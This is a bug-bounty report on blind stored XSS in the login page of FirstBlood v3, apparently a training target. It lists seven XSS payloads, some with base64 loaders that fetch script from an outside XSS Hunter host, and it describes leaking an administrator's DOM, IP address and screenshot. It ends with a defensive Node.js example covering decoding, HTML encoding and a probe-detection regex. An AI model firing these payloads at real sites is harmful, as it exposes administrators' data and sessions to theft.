FirstBlood-#1310 Blind XSS on login page disclosing admin panel access
This issue was discovered on FirstBlood v3

On 2022-12-09, ar6aaz Level 3 reported:

Hello Team,

I have found a Blind XSS vulnerability on FirstBlood v3. When you visit the login page, you will notice the message "Login attempts will be logged".

That made me think there could be either a Blind XSS or a Log4j bug here. The application being built on PHP rules out Log4j, so I tried Blind XSS and it worked.

Steps to Reproduce:

  1. Go to the login page.
  2. Enter Blind XSS payload in the username/password fields.

You will receive a notification of your Blind XSS being fired in your inbox. The XSS fires on

You can create Blind XSS payloads by self-hosting XSS Hunter or by using a hosted XSS Hunter account. Some sample payloads that worked for me:

  1. "><script src=></script>
  2. javascript:eval('var a=document.createElement(\'script\');a.src=\'\';document.body.appendChild(a)')
  3. "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
  4. "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>
  5. "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
  6. "><iframe srcdoc="<script>var a=parent.document.createElement('script');a.src='';parent.document.body.appendChild(a);</script>">
  7. <script>$.getScript("//")</script>

Impact: We are able to get a screenshot of the admin panel where the XSS fires for the user Administrator-Sean. Along with that, the Blind XSS also leaks other information such as:

  1. IP address:
  2. Entire DOM data
  3. Screenshot of Admin panel:


Endpoint: /login.php

Parameter: username/password

Payload: "><script src=></script>

FirstBlood ID: 72
Vulnerability Type: Stored XSS

Login attempts were logged on an internal panel, and the logged username is rendered there without encoding, so it is vulnerable to blind XSS affecting FirstBlood staff.
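As an added illustration (not part of the report above and not FirstBlood's own code), the following Node.js snippet models the panel this verdict describes: a login-attempt log rendered to staff with the username concatenated straight into the markup, beside the encoded version that neutralises it, plus a decode of the base64 blob carried by payloads 3 to 5 in the report. The base64 is taken from the report; the log entry, the row template, the double-quoted attribute context (inferred from the `">` prefix the payloads use), the IP address and the probe regex are constructed assumptions. `escapeHtml` is the moral equivalent of PHP's `htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8')`, which is what the PHP panel should call on every logged value.

```javascript
// Added example, not from the report or the FirstBlood code base.
// Models a "login attempts" admin panel that renders attacker-supplied
// usernames, and shows why "internal" does not mean "trusted".
// Plain Node.js, no dependencies.

// Base64 blob copied verbatim from payloads 3-5 of the report.
const REPORT_PAYLOAD_B64 =
  'dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==';

// What eval(atob(this.id)) runs in the admin's browser: a loader that pulls
// the XSS Hunter probe script from the attacker's callback host. The probe
// is what ships the DOM, screenshot and IP back to the reporter's inbox.
function decodeLoader(b64) {
  const js = Buffer.from(b64, 'base64').toString('utf8');
  const m = js.match(/a\.src="([^"]+)"/);
  return { js, callbackHost: m ? new URL(m[1]).host : null };
}

// Minimal HTML encoder covering the characters that break out of text and
// double/single-quoted attribute contexts.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed log entry shaped like what the page describes: the attempt
// is stored at /login.php and displayed to staff later.
const sampleAttempt = {
  ts: '2022-12-09T10:00:00Z',
  ip: '203.0.113.7',                      // constructed (documentation range)
  username: '"><script src=></script>',   // payload 1 from the report
  success: false,
};

// The bug: username lands inside value="..." unencoded. The leading `">`
// closes the attribute and the tag; <script> then becomes real markup.
function renderRowUnsafe(a) {
  return `<tr><td>${a.ts}</td><td>${a.ip}</td>` +
         `<td><input value="${a.username}" readonly></td>` +
         `<td>${a.success ? 'ok' : 'failed'}</td></tr>`;
}

// The fix: encode every logged value for the HTML context it is written
// into. Staff still see the payload as text; the browser never parses it.
function renderRowSafe(a) {
  return `<tr><td>${escapeHtml(a.ts)}</td><td>${escapeHtml(a.ip)}</td>` +
         `<td><input value="${escapeHtml(a.username)}" readonly></td>` +
         `<td>${a.success ? 'ok' : 'failed'}</td></tr>`;
}

// Counts opening tags in a rendered row. The template itself emits exactly
// six (<tr>, four <td>, <input>); any extra tag came from logged data.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}
const TEMPLATE_TAG_COUNT = 6;

// Detection side of the same log store: a coarse signal for usernames that
// carry markup or script tokens, so blind-XSS probing raises an alert
// instead of firing in an administrator's browser. Tune before production.
const PROBE_RE = /<\s*\/?\s*[a-z]|\bon[a-z]+\s*=|javascript:|atob\(|eval\(/i;
function looksLikeXssProbe(username) {
  return PROBE_RE.test(username);
}

// Stand-alone run: show the decoded loader and the two renderings.
const decoded = decodeLoader(REPORT_PAYLOAD_B64);
console.log('decoded loader  :', decoded.js);
console.log('callback host   :', decoded.callbackHost);
console.log('unsafe row tags :', countTags(renderRowUnsafe(sampleAttempt)));
console.log('safe row tags   :', countTags(renderRowSafe(sampleAttempt)));
console.log('flagged as probe:', looksLikeXssProbe(sampleAttempt.username));
```

The unsafe row grows an extra `<script` tag that the template never wrote; the safe row does not, and the decoded loader makes the "internal panel" trust boundary concrete: the script it fetches runs with whatever the logged-in administrator can see.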

Congratulations, you were the second user to report this! For finding this you have won yourself a LIMITED edition BugBountyHunter hat!